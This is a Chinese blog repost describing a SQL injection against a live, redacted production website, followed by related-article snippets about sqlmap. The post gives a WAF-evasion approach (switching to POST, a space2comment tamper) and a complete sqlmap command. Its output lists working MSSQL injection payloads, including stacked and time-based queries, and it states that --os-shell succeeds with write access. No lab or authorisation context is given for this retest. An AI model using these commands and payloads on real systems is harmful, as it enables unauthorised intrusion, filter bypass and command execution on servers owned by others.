SQLMAP SSI注入错误解决

最新推荐文章于 2023-05-22 21:52:53 发布
最新推荐文章于 2023-05-22 21:52:53 发布
阅读量190 收藏 1
点赞数
文章标签: python
原文链接:http://www.cnblogs.com/-qing-/p/10508570.html
版权

 

 

记一次SQL注入

 

目标地址:https://www.xxxx.com/

 

之前补天提交过这个注入  后来貌似”修复了”(实际就是装了安全狗和过滤了一些关键字)

 

不过今天试了下 还是可以注入

 

 

 

可以看到已经有安全狗拦截get方式的注入字符

 

目标站是伪静态重写了url 改一下提交规则即可

 

改成post提交(默认安全狗只拦截get方式)

 

 

可以接受post参数 经过测试 拦截了一些空格和敏感字符

 

 

 

直接上sqlmap跑 注意线程和伪造http

 

 

因为目标站是https 我加了--force-ssl参数 指定为https,但是显示https 连接出错。

因为sqlmap没办法忽略https证书 所以有两个解决方法

  1. 通过本地代理端口进行访问

  2. 通过搭建web,访问代理文件进行注入

 

 

第一种简单又不涉及代码 直接burpsuite代理本地8080端口,然后sqlmap通过8080端口进行访问注入即可(当然其他本地映射charles也可以)

 

 

 

-u https://www.xxx.com/news_show.asp --data=id=3395 --safe-url=https://www.xxxx.com/news_show.asp?/3395.html --safe-freq=2 --tamper space2comment.py --force-ssl --proxy http://127.0.0.1:8080 --random-agent -v 3

 

 

结果:

Parameter: id (POST)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=3395 AND 1967=1967

    Vector: AND [INFERENCE]

 

    Type: error-based

    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)

    Payload: id=3395 AND 8669 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (8669=8669) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)))

    Vector: AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

 

    Type: inline query

    Title: Microsoft SQL Server/Sybase inline queries

    Payload: id=(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6806=6806) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113))

    Vector: (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')

 

    Type: stacked queries

    Title: Microsoft SQL Server/Sybase stacked queries (comment)

    Payload: id=3395;WAITFOR DELAY '0:0:5'--

    Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

 

    Type: AND/OR time-based blind

    Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)

    Payload: id=3395 WAITFOR DELAY '0:0:5'--

Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

 

 

 

因为是SQL server 不需要找路径,测试后可以--os-shell 有写入权限 后面就不深入测试了

 

转载于:https://www.cnblogs.com/-qing-/p/10508570.html

weixin_30379973
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
关于 SQLMAP报错如何解决
zengcaomeiii的博客
07-01 1785
11
关于解决kali对主机dvwa进行sql注入失败问题
qq_36836233的博客
03-08 886
关于sqlmap的问题
SQL注入知识点详解
qq_44857938的博客
06-19 1153
SQL注入 大家好,我又来了,这回给大家分享一下自己总结的sql注入学习笔记,sql注入是一个极为重要的漏洞,可能博主总结的有所缺陷,希望大家多多补充,大家一起进步,好了,闲话少扯,直接上干货。 1.SQL注入介绍 SQL注入攻击就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。 (1)造成SQL注入的原因 程序开发过程中不注意书写规范,对sql语句和关键字过滤不严格,导致客户端可以通过全局性变量get或者post提交sql语句到服务器端正常运行。
关于kali使用sqlmap工具对sqli-labs-master进行sql注入时出现错误“No route to host”的解决办法
qq_58018041的博客
05-22 849
在kali中使用sqlmap工具对sqli-labs-master进行sql注入时出现错误“No route to host”,解决办法是将kali中原有的sqlmap卸载重装。2、切换到目录/usr/share下查看是否存在sqlmap工具。4、在/usr/share目录下再次查看,确认删除成功。6、测试一下进行sql注入是否还会出错,已经没有报错了。1、进入root权限下,避免权限不够。5、重新安装sqlmap工具。3、删除sqlmap工具。
user-agent问题
weixin_45378289的博客
06-07 846
SQLMap使用中遇到的问题 user-agent问题 [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option ‘–user-agent’ or switch ‘–random-agent’. sqlmap is going to retry the request(s) 解决方案: 命令后 --user-agent 或者
sqlmap sql 注入测试工具
最新发布
03-06
- 自动检测:SQLMap能自动识别网站是否存在SQL注入漏洞,通过对网页请求参数进行多种注入技术尝试,如盲注、时间基注入错误注入等。 - 数据提取:一旦检测到注入SQLMap可以获取数据库中的表名、列名,并读取或...
sqlmap注入漏洞测试
02-22
SQLMap 注入漏洞测试 在 Web 应用程序中, SQL 注入是一种常见的安全漏洞,它可以让攻击者访问和控制数据库中的敏感数据。SQLMap 是一款自动化的 SQL 注入工具,它可以检测和利用 SQL 注入漏洞,以获取数据库中的...
SQLMAP注入使用
05-13
SQLMAP注入使用 SQLMAP是一款强大的注入工具,相比经典的啊D和明小子之类的注入工具,SQLmap更加强大,无论是自带字典,功能还是界面优化,都是一款非常不错的注入工具。sqlmap可以多平台运行,windows,linux下...
sqlmap sql注入
08-22
1. **自动检测**:SQLMap能够自动识别是否存在SQL注入漏洞,通过对输入参数进行各种测试,如时间延迟注入、盲注、基于错误注入等。 2. **枚举与信息收集**:一旦发现注入点,SQLMap可以枚举数据库的版本、表格名...
sqlmap注入神器
12-30
sqlmap是一款注入神器,灵活的运作它将是你更有效率的完成工作
Sqlmap使用遇到的问题
热门推荐
y_guan的专栏
05-31 1万+
SQLMap使用中遇到的问题 user-agent问题 [15:57:12] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option ‘–user-agent’ or switch ‘–random-agen...
SQL 注入之报错及盲注及使用sqlmap 注入
weixin_52281518的博客
02-11 3973
报错注入 报错注入就是利用率数据库的某些机制,人为的制造错误条件,使得查询结果能够出现在错误的信息中 Updatexml() 函数用法:updatexml(XML_document,XPath_string,new_value); XML_document 是String格式,为XML文档对象的名称,中文名为Doc XPath_string XPath格式的字符串 new_value String格式,替换查找到的符合条件的数据 我们通常在第二个xpath参数填写我们要查询的内容。 Up
sqlmap sql注入问题
godflowerszzz的博客
07-10 1215
以下无法满足字段中本身需要带操作类型的参数 https://www.cnblogs.com/pypua/articles/9561629.html 解决mybatis-plus动态排序,导致的SQL注入问题 https://springboot.io/t/topic/905 使用过滤器过滤MP的排序sql注入结合 https://my.oschina.net/xiaohui249/blog/1616865?utm_medium=referral 过滤相关字符 else if (key.equals("or
sql注入
m0_67352890的博客
05-13 486
靶场地址:http://110.40.154.100:8000/ 1.在浏览器上打开靶场 2.在网站后边输入 authenticate 进行用户验证 Django 提供的函数 authenticate 用于处理登录账户的验证是否存在 3.在网址后面输入damin 进入登陆页面 3.账号是:admin 密码随便输入,然后用burpsuite抓包 3.1打开burpsuite进行抓包 进入proxy 点击Intercept is off 点击刚才浏览器Log in 就抓...
Sqlmap 渗透注入总是显示无法连接目标网络问题分析与解决
Specif1c的博客
08-04 1万+
问题如下: [CRITICAL] connection reset to the target URL. sqlmap is going to retry the request(s) 分析与解决: 1、在 sqlmap 安装目录下(/usr/share/sqlmap/)启动 sqlmap。 2、看注入的目标地址是不是 https 协议,如果是可以使用sqlmap直接加上–force-ssl参数,告诉sqlmap这是https服务。或者可以在Host头后面加上:443(默认不是443)。 3、ip
Web漏洞分析(dvwa、SQL手工注入sqlmap注入)
王陈锋的博客
11-07 3486
借助Web漏洞教学和演练的开源工具DVWA,学习并了解Web漏洞(以SQL注入为例)的原理及利用,验证SQL注入漏洞的实现过程及结果,并思考应对web漏洞风险的策略与手段。1、操作系统:windows 7/8/10等2、开发环境:DVWA。
sqlmap问题及解决办法
启航之路
05-24 1万+
真好,一个sqlmap注入问题困扰我一周,最后发现命令给错了。 事情是这样子的: 利用sqlmap对DVWA中Low进行SQL注入 输入: python sqlmap.py -u http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1 报错:不可注入…提示 后来我根据提示中的命令重新输入了一次,发现还是有问题(单独加cookie也不行) 吐了呀,一直以为环境有问题,sqlmappython又重装了一遍。 然后用kali虚拟机注入,都一样结
sqlmap 注入遇到问题总结
diechusi8056的博客
01-07 3671
1:登陆后才能访问的页面      sqlmap.py -u "http://www.code521.com/index.php&a=b" -p a --dbms=mysql --cookie="cookie" –tables //抓包获取COOKIE,修改之后继续 sqlmap -r "/root/sql.t" //直接通过burp抓取整个页面的数据包...
sqlmap 时间注入
05-27
SQLMap是一款强大的SQL注入工具,可以检测和利用不同类型的SQL注入漏洞。其中,时间注入是一种特殊的SQL注入技术,通常用于绕过一些过滤和防御机制。 时间注入的原理是在SQL语句中插入延时函数,例如`sleep()`函数。如果应用程序对输入参数进行了过滤或转义,那么正常的SQL注入语句可能会被过滤或转义,但是时间注入可以通过延时函数绕过这些限制,并且在服务器上执行命令。 SQLMap可以使用`--time-sec`参数来测试时间注入漏洞。例如,以下命令将对目标网站的`id`参数进行时间注入测试,并设置延时为5秒: ``` python sqlmap.py -u "http://example.com/index.php?id=1" -p id --level=5 --risk=3 --time-sec=5 ``` 该命令将通过不断的尝试来判断SQL注入是否成功,如果延时达到了5秒,则表示注入成功,否则注入失败。 需要注意的是,时间注入可能会对数据库服务器造成一定的负担,所以在测试时应当小心谨慎,避免对目标系统造成不必要的影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值